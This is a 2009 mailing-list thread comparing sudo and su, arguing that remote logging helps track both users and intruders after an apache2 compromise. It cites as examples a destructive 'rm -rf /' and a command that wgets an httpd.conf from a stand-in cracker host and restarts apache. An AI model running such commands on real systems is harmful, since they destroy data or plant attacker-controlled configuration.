[Leaplist] sudo vs su

Richard F. Ostrow Jr. rich at warfaresdl.com
Mon Jun 1 13:36:58 EDT 2009 

Jim,

For whatever reason, I never got your post (taken from Kevin's reply).

At any rate, as far as remote logging goes, it's more than just to track
what you or your authorized users are doing - it's for tracking what
remote attackers are doing and preventing them from covering their tracks.
Sure, you probably wouldn't do anything as stupid as an "rm -rf /"... but
would you do a "cd /usr/local/etc/apache2/ && wget
http://somecracker.net/compromisedapacheconfs/httpd.conf &&
/usr/local/etc/rc.d/apache2 restart"? You may not even see it happen.
Granted, you probably wouldn't even with remote logging (unless you
regularly check), but they can always wipe their activity from the log.

I state this because I was recently compromised with a 2-month old build
of apache2. The hackers were not very sophisticated (did not cover their
tracks), and never got root access (everything was done as www user), but
it got me thinking about securing my boxes and how to adapt to various
attacks (like locking out an IP address at the firewall level at a single
failed SSH login - prevents brute force attacks, and if I lock myself out,
I login from another server somewhere (sf.net, for instance) and reset
it). It also tends to block people who inadvertently became a part of bot
nets or similar when I get distributed brute force attacks (my logs do
show as much, as I had at one point 250 login attempts for a single
(nonexistent) user from 250 different IP addresses in under 1 minute). I
also lock IP addresses out for other abuses (excessive connection attempts
on any port, for instance... haven't gotten into trouble with this one
(yet)).

Jim Hartley wrote:
> Remote logging system???? I don't have a remote logging system. I have
> just my one desktop machine here. In that context, does "sudo" have any
> advantages? I am assuming that **I** am not going to do something stupid
> like "rm -rf /"
>
> Jim Hartley
>
> Richard F. Ostrow Jr. wrote:
>> Ok, now that we're actually talking in the right topic, here's the
>> _correct_ answer.
>>
>> su - input not logged, difficult to backtrace what was done in the
>> event
>> of a catastrophic screwup (rm -rf /)
>>
>> sudo - can easily track what was done. Everything put into sudo goes
>> into
>> /var/log/{hostname}/messages of the remote logging system. An 'rm -rf
>> /'
>> would be logged on the remote machine, and I would know *exactly* who
>> was
>> stupid enough to do such a thing, and can make them clean up the mess.
>>
>> I wonder which one is better from an SA standpoint?
>>
>>
>

-- 
Life without passion is death in disguise


-- 
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean.

More information about the Leaplist mailing list